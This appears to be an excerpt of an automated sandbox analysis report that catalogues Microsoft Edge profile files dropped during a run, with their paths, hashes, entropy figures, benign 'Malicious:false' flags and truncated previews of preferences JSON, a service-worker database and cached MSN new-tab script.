                                                                                                                                                            SHA1:6DFC800D2C67A332B72884BDDEDE8A231EAEB35F
                                                                                                                                                            SHA-256:86E8C808D16056DAFA4449DE639D0C5F372B654C319516D5FC598DDD7FC4045E
                                                                                                                                                            SHA-512:FFD7FDF11BC4C78963D8420DE2E1BDCC611ADB93FE5F9D094BBE1C79D1E1A4D0CD3A95EF60760A6BFB719170DBD0DE1929AB28D0268E7A02B489E0F84E71078B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13725
                                                                                                                                                            Entropy (8bit):5.124100185492223
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:sVmoJ9pQTryZiuaba4uypnNJk3aYjY5pOK8Gpj+FeJYQwHt+dl1f:sV7LAJu4NJk3QpUjQwYx
                                                                                                                                                            MD5:6E4F6A1DDC38A73B9B1DFCFFFEC345B4
                                                                                                                                                            SHA1:09FBA3C675A4CE417EF7CD3C89781014B57A6A3A
                                                                                                                                                            SHA-256:61B76C4721C16712EBF4B3CC3D5546D72A7B9E534B64DEF96CEF5D3AFE3023F0
                                                                                                                                                            SHA-512:D4E2897ED81412C153E92FDDE4C7C65CE3312FE88A36945A3966FEFCF292D78CEA5527BF26CD8F76592D395927A016A2B385B4E5F012374B92CB39381D6937B3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380674698994767","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3c303.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13725
                                                                                                                                                            Entropy (8bit):5.124100185492223
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:sVmoJ9pQTryZiuaba4uypnNJk3aYjY5pOK8Gpj+FeJYQwHt+dl1f:sV7LAJu4NJk3QpUjQwYx
                                                                                                                                                            MD5:6E4F6A1DDC38A73B9B1DFCFFFEC345B4
                                                                                                                                                            SHA1:09FBA3C675A4CE417EF7CD3C89781014B57A6A3A
                                                                                                                                                            SHA-256:61B76C4721C16712EBF4B3CC3D5546D72A7B9E534B64DEF96CEF5D3AFE3023F0
                                                                                                                                                            SHA-512:D4E2897ED81412C153E92FDDE4C7C65CE3312FE88A36945A3966FEFCF292D78CEA5527BF26CD8F76592D395927A016A2B385B4E5F012374B92CB39381D6937B3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380674698994767","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3f7fd.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13725
                                                                                                                                                            Entropy (8bit):5.124100185492223
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:sVmoJ9pQTryZiuaba4uypnNJk3aYjY5pOK8Gpj+FeJYQwHt+dl1f:sV7LAJu4NJk3QpUjQwYx
                                                                                                                                                            MD5:6E4F6A1DDC38A73B9B1DFCFFFEC345B4
                                                                                                                                                            SHA1:09FBA3C675A4CE417EF7CD3C89781014B57A6A3A
                                                                                                                                                            SHA-256:61B76C4721C16712EBF4B3CC3D5546D72A7B9E534B64DEF96CEF5D3AFE3023F0
                                                                                                                                                            SHA-512:D4E2897ED81412C153E92FDDE4C7C65CE3312FE88A36945A3966FEFCF292D78CEA5527BF26CD8F76592D395927A016A2B385B4E5F012374B92CB39381D6937B3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380674698994767","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4292f.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13725
                                                                                                                                                            Entropy (8bit):5.124100185492223
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:sVmoJ9pQTryZiuaba4uypnNJk3aYjY5pOK8Gpj+FeJYQwHt+dl1f:sV7LAJu4NJk3QpUjQwYx
                                                                                                                                                            MD5:6E4F6A1DDC38A73B9B1DFCFFFEC345B4
                                                                                                                                                            SHA1:09FBA3C675A4CE417EF7CD3C89781014B57A6A3A
                                                                                                                                                            SHA-256:61B76C4721C16712EBF4B3CC3D5546D72A7B9E534B64DEF96CEF5D3AFE3023F0
                                                                                                                                                            SHA-512:D4E2897ED81412C153E92FDDE4C7C65CE3312FE88A36945A3966FEFCF292D78CEA5527BF26CD8F76592D395927A016A2B385B4E5F012374B92CB39381D6937B3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380674698994767","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PreferredApps

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):33
                                                                                                                                                            Entropy (8bit):4.051821770808046
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                                                                                                                                            MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                                                                                                                                            SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                                                                                                                                            SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                                                                                                                                            SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"preferred_apps":[],"version":1}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):34462
                                                                                                                                                            Entropy (8bit):5.558701456590119
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:TOhlEhpWPdBfq38F1+UoAYDCx9Tuqh0VfUC9xbog/OV+F7Ilrw/pQDdKp3tuR:TOhlEhpWPdBfq3u1jaH1IO/pauty
                                                                                                                                                            MD5:742EA671A3705EE09904218D2E4B51E5
                                                                                                                                                            SHA1:644C10C785935458C159564C459337FD00D4FA61
                                                                                                                                                            SHA-256:FFB6E2457C6ED9863E641322222157EE85E10733CEE3F9FB49D4A7FB3C48298A
                                                                                                                                                            SHA-512:072316A3006CF08589F2475AF8B237ED6E0BDC838B1E949FA18213C58BB237F0D28A1A958FF6BB4DE4491A3629778B08242EB8B7FBD49EA4F549A09328D556C5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380674698346217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380674698346217","location":5,"ma

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3c4f7.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):34462
                                                                                                                                                            Entropy (8bit):5.558701456590119
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:TOhlEhpWPdBfq38F1+UoAYDCx9Tuqh0VfUC9xbog/OV+F7Ilrw/pQDdKp3tuR:TOhlEhpWPdBfq3u1jaH1IO/pauty
                                                                                                                                                            MD5:742EA671A3705EE09904218D2E4B51E5
                                                                                                                                                            SHA1:644C10C785935458C159564C459337FD00D4FA61
                                                                                                                                                            SHA-256:FFB6E2457C6ED9863E641322222157EE85E10733CEE3F9FB49D4A7FB3C48298A
                                                                                                                                                            SHA-512:072316A3006CF08589F2475AF8B237ED6E0BDC838B1E949FA18213C58BB237F0D28A1A958FF6BB4DE4491A3629778B08242EB8B7FBD49EA4F549A09328D556C5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380674698346217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380674698346217","location":5,"ma

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3f492.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):34462
                                                                                                                                                            Entropy (8bit):5.558701456590119
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:TOhlEhpWPdBfq38F1+UoAYDCx9Tuqh0VfUC9xbog/OV+F7Ilrw/pQDdKp3tuR:TOhlEhpWPdBfq3u1jaH1IO/pauty
                                                                                                                                                            MD5:742EA671A3705EE09904218D2E4B51E5
                                                                                                                                                            SHA1:644C10C785935458C159564C459337FD00D4FA61
                                                                                                                                                            SHA-256:FFB6E2457C6ED9863E641322222157EE85E10733CEE3F9FB49D4A7FB3C48298A
                                                                                                                                                            SHA-512:072316A3006CF08589F2475AF8B237ED6E0BDC838B1E949FA18213C58BB237F0D28A1A958FF6BB4DE4491A3629778B08242EB8B7FBD49EA4F549A09328D556C5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380674698346217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380674698346217","location":5,"ma

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2394
                                                                                                                                                            Entropy (8bit):5.811106020584051
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:F2xc5NmycncmoDCRORpllg2hEKfRHgldCRORpllg2hR7y3FCRORpllg2hEFRHgk9:F2embMrd6KfBkrdn2Prd6FBlrd3B7
                                                                                                                                                            MD5:B9A2B1C5B545631723AB453C42F53104
                                                                                                                                                            SHA1:D34B4666D22A66C0DF8F83D93C36556C46451A49
                                                                                                                                                            SHA-256:4FE023E655B0EFB2BD93D617A3444C61F2AFA72EDB8AF8CC0B34246DE1ACA4EF
                                                                                                                                                            SHA-512:C196CAC1C502D58A5696DA2995F7AFBB67DC37D92CBF2CF0766AC6038E5332980259746644E327AA277B4F0CA580D434395F63E4BD62588B3937600F5C83487D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2.Gx..................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):297
                                                                                                                                                            Entropy (8bit):5.188351009524501
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/p+K1wkn23oH+TcwtE/a252KLl9pqIS39+q2Pwkn23oH+TcwtE/a2ZIFUv:7/p+VfYeb8xLzpLi+vYfYeb8J2FUv
                                                                                                                                                            MD5:6C860AA29DBA5A28386B1927801BBF1D
                                                                                                                                                            SHA1:64D5E55E2BD807FA22EECA9DE00FDAB9D62E1B21
                                                                                                                                                            SHA-256:ADF3499155407E09812A3650EABC7A1BDABCE1FAAA29A5B158D42D3A3EDB7F68
                                                                                                                                                            SHA-512:094991A2F80B4BB968F733E9E7D969D4CC667E4D063D132A9149214DE5B0AA2C805EB858637CE9CEC3DA6A52E7E1733C98DC1D3D4554E96D5E24C626F9F7A569
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:05:08.868 14bc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/06-17:05:08.892 14bc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):41
                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):115273
                                                                                                                                                            Entropy (8bit):5.578450319014886
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/ImL/rBZXJCjPXNtrbXMTQ1TI6h:B9LyxPXfOxr1lMe1nL/5L/TXJ6zQ0z
                                                                                                                                                            MD5:4DA99BB4F1571B3DA0079C469C972669
                                                                                                                                                            SHA1:66AC86833CE703DC8F3654375F8F01671C0D235E
                                                                                                                                                            SHA-256:A13FE8EFC1A91F176B69335595BAB1AAF9B489A978D08582F9436A65262B1C81
                                                                                                                                                            SHA-512:81A54B3DF059828430A42854A18C543F5F2021FB062095EDE73BB9E5F99245385E65B66CE28F2E134E6BCFC46C851748C143B80C2B449492DAEE25CF74A9A671
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):189841
                                                                                                                                                            Entropy (8bit):6.389336214674335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:Jl+cQJiTDirpyhawsPWIEQtL/RX+UKbPM4johhlYnP/E:PhawTIE+L/h+NYA9U
                                                                                                                                                            MD5:D65B43E91C51AFF17AE186738DAB0149
                                                                                                                                                            SHA1:AE605C7B1226F64C004765C2CD01030557F9D081
                                                                                                                                                            SHA-256:8658A492122D830C5FE9316E61DDFB75D43D154DAA487BB735C5FE926E841E2C
                                                                                                                                                            SHA-512:0F515165A911316006DA01E9DE777C445C141EAAD0587FB81509A69B3763B45EDC21B1B2E67D1F4703226F63364F7D40D7192210BC881C8B65787E710540DF72
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:0\r..m..........rSG.....0....Lp.................;\......*8........,T.8..`,.....L`.....,T...`......L`......Rcf.K<....exports...Rc.2ix....module....Rc^......define....Rb..?.....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q....].{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....`...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):24
                                                                                                                                                            Entropy (8bit):2.1431558784658327
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:m+l:m
                                                                                                                                                            MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                            SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                            SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                            SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:0\r..m..................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):72
                                                                                                                                                            Entropy (8bit):3.565412423760729
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:FvzX00Xl/l7n/lxEstllTIXx:NXjEsuB
